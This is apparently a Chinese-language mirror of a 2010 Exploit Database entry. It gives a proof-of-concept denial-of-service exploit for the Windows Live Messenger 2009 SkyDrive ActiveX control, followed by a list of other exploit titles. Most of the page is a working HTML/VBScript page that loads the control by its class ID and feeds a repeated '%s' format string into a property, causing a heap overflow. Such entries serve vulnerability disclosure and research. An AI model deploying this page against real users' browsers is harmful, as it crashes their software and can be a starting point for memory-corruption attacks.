Microsoft Windows Live Messenger 2009 – ActiveX Heap Overflow (PoC)

Exploit Database
16 阅读

作者： SarBoT511

日期： 2010-01-21
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/11214/

#Aouther : [SarBoT511] (xs3@hotmail.com)
#Exploits title :[Windows Live Messenger 2009 ActiveX Heap Overflow PoC]
#tested on :[windows 7 & Vista & Xp sp3]
#Windows Live Messenger SkyDrive 2009

<html>
<object classid='clsid:C2828995-4A83-4100-A212-3024BA117356' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Live SkyDrive\Microsoft.Live.Folders.RichUpload.3.dll"
prototype= "Property Let RichUploadControlContextData As String"
memberName = "RichUploadControlContextData"
progid = "RichUploadLib.UploadControl"
argCount = 1
 
arg1="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
 
target.RichUploadControlContextData = arg1
 
</script>

last Exploits
Microsoft Windows Live Messenger 2009 – ActiveX Heap Overflow (PoC)的更多信息

LibreOffice 3.5.2.2 – Memory Corruption：
Adobe Flash – Heap Use-After-Free in SurfaceFilterList::CreateFromScriptAtom：
GSearch 1.0.1.0 – Denial of Service (PoC)：
LG MRA58K – Out-of-Bounds Heap Read in CAVIFileParser::Destroy Resulting in Invalid Free：
Oracle Outside In PDF 8.5.2 – Parsing Memory Corruption (1)：
NBMonitor 1.6.6.0 – ‘Key’ Denial of Service (PoC)：
Microsoft Edge – CMarkup::EnsureDeleteCFState Use-After-Free (MS15-125)：
Microsoft DirectWrite / AFDKO – Heap-Based Buffer Overflow Due to Integer Overflow in readTTCDirectory：